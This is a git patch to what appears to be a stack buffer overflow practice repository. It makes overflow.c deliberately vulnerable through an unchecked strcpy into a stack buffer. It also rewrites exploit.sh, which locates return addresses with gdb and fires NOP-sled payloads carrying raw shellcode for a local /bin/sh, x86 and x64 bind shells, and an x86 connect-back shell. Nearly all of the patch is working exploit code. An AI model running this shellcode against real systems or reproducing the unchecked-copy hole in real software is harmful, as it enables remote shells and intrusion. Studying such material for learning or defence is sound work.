From 315745e24bf37a5fd8324e737272dc4b594dfd7e Mon Sep 17 00:00:00 2001
From: Toni Uhlig <matzeton@googlemail.com>
Date: Thu, 13 Apr 2017 03:57:20 +0200
Subject: return adr finder

---
 .gitignore       |   1 +
 Makefile         |   2 +-
 dump32.gdb       |   3 ++
 dump64.gdb       |   3 ++
 exploit.sh       | 117 +++++++++++++++++++++++++++++++++++++++++--------------
 funcjmp_simple.c |   2 +-
 overflow.c       |   9 ++---
 7 files changed, 101 insertions(+), 36 deletions(-)
 create mode 100644 dump32.gdb
 create mode 100644 dump64.gdb

diff --git a/.gitignore b/.gitignore
index bd8d165..17082e4 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,4 +8,5 @@ sc-test
 sc-test_x64
 funcjmp_simple
 funcjmp_ext
+funcjmp_ext_x86
 format
diff --git a/Makefile b/Makefile
index 8854367..5e5ba04 100644
--- a/Makefile
+++ b/Makefile
@@ -4,7 +4,7 @@ RM := rm
 CC := gcc
 STRIP := strip
 LBITS := $(shell getconf LONG_BIT)
-CFLAGS += -Wall
+CFLAGS += -Wall -O0
 OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
 X86_FLAGS = -m32 -mpreferred-stack-boundary=2
 X64_FLAGS = -m64 -mpreferred-stack-boundary=4
diff --git a/dump32.gdb b/dump32.gdb
new file mode 100644
index 0000000..aa088da
--- /dev/null
+++ b/dump32.gdb
@@ -0,0 +1,3 @@
+run
+info r
+x/300xw $esp-0x300
diff --git a/dump64.gdb b/dump64.gdb
new file mode 100644
index 0000000..3facd15
--- /dev/null
+++ b/dump64.gdb
@@ -0,0 +1,3 @@
+run
+info r
+x/300xw $rsp-0x300
diff --git a/exploit.sh b/exploit.sh
index 55d79e1..d986fe4 100755
--- a/exploit.sh
+++ b/exploit.sh
@@ -1,41 +1,100 @@
 #!/bin/sh
 
-# shellcode generated with metasploit (exec /bin/sh):
+# generate shellcode with metasploit (exec /bin/sh):
 #   ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
 # uses (currently) only self-written shellcode ..
 
+
+DIR="$(dirname $0)"
+
+find_return_adr32() {
+	if [ -z "$1" -o -z "$2" -o -z "$3" ]; then
+		return 1
+	fi
+	ret=$(gdb -batch -x "${DIR}/dump32.gdb" --args $1 $2)
+	adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
+	if [ $? -ne 0 ]; then
+		echo "$0: no adr found: ${adr}"
+		return 1
+	fi
+	chs=$(echo ${adr} | cut -d ' ' -f $3)
+	if [ $? -ne 0 ]; then
+		echo "$0: check adr index: $3"
+		return 1
+	fi
+	echo $(echo "${chs}" | sed 's/0x\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)/\\x\4\\x\3\\x\2\\x\1/')
+	return 0
+}
+
+find_return_adr64() {
+	if [ -z "$1" -o -z "$2" -o -z "$3" ]; then
+		return 1
+	fi
+	ret=$(gdb -batch -x "${DIR}/dump64.gdb" --args $1 $2)
+	adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
+	if [ $? -ne 0 ]; then
+		echo "$0: no adr found: ${adr}"
+		return 1
+	fi
+	chs=$(echo ${adr} | cut -d ' ' -f $3)
+	if [ $? -ne 0 ]; then
+		echo "$0: check adr index: $3"
+		return 1
+	fi
+python - <<EOF
+import struct, binascii
+print repr(struct.pack('<Q', int('$chs',16)))[1:33]
+EOF
+        return 0
+}
+
+if [ ! -f "${DIR}/overflow" -o ! -f "${DIR}/overflow_x64" ]; then
+	echo "$0: run make first!"
+	exit 1
+fi
+
+RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3)
+RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3)
+
+
 if [ -z "$1" ]; then
-	echo "$0 [local|bind|connect]"
+	echo "$0 [local32|local64|bind32|bind64|connect32]"
 	exit 1
 fi
 
-echo "$0: exec exploit ( x$(getconf LONG_BIT) ) .."
-if [ "$1" = "local" ]; then
-	if [ $(getconf LONG_BIT) -eq 32 ]; then
-		# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
-		# uses own shellcode: shellcode/hello.asm (x86-nasm)
-		./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\xc4\xf2\xff\xbf"'`
-	else
-		# 133xNOP + shellcode(34) + 145xNOP + return addr
-		# uses own shellcode: shellcode/execve_x64.o
-		./overflow_x64 `python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "\x02\xe7\xff\xff\xff\x7f"'`
-	fi
-elif [ "$1" = "bind" ]; then
-	if [ $(getconf LONG_BIT) -eq 32 ]; then
-		# 85xNOP + shellcode(134) + 85xNOP + return addr
-		# uses own shellcode: shellcode/socket.asm (x86-nasm)
-		./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
-	else
-		# 100xNOP + shellcode(149) + 63xNOP + return addr
-		# uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
-		./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05"  + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`
-	fi
-elif [ "$1" = "connect" ]; then
-	if [ $(getconf LONG_BIT) -eq 32 ]; then
-		# 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
-		# uses own shellcode: shellcode/connect.asm (x86-nasm)
-		./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
-        fi
+if [ "$1" = "local32" ]; then
+
+	# NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
+	# uses own shellcode: shellcode/hello.asm (x86-nasm)
+	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
+	./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
+
+elif [ "$1" = "local64" ]; then
+
+	# NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
+	# uses own shellcode: shellcode/execve_x64.o
+	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
+	gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
+
+elif [ "$1" = "bind32" ]; then
+
+	# 85xNOP + shellcode(134) + 85xNOP + return addr
+	# uses own shellcode: shellcode/socket.asm (x86-nasm)
+	./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
+
+elif [ "$1" = "bind64" ]; then
+
+	# 100xNOP + shellcode(149) + 63xNOP + return addr
+	# uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
+	./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05"  + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`
+
+elif [ "$1" = "connect32" ]; then
+
+	# 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
+	# uses own shellcode: shellcode/connect.asm (x86-nasm)
+	./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
+
 else
 	$0
 fi
+
diff --git a/funcjmp_simple.c b/funcjmp_simple.c
index 63946c8..97db760 100644
--- a/funcjmp_simple.c
+++ b/funcjmp_simple.c
@@ -5,7 +5,7 @@
 #define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \
 	asm volatile(_asm_str); \
 	asm volatile(".att_syntax prefix");
-#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void)
+#define JUMPABLE_FUNC(fname) int fname(void)
 #define JMP_FUNC_DECL(func) void *fptr = (void *)( &func );
 #define JMP_TO_FUNC \
 	INTEL_ASM(" \
diff --git a/overflow.c b/overflow.c
index 8fb07b9..1d9e4cf 100644
--- a/overflow.c
+++ b/overflow.c
@@ -13,20 +13,19 @@
 #define BUFLEN    300
 
 void
-overflow(const char *src, char *dst)
+overflow(const char *src)
 {
+  char buf[BUFLEN];
   /* exploitable function */
-  strcpy(dst, src);
+  strcpy(&buf[0], src);
   /* nothing to do, just return */
 }
 
 int
 main(int argc, char **argv)
 {
-  char buf[BUFLEN];
-
   if (argc > 1) {
-      overflow(argv[1], buf);
+      overflow(argv[1]);
   } else {
     fprintf(stderr, "arg1 missing\n");
     return(1);
-- 
cgit v1.2.3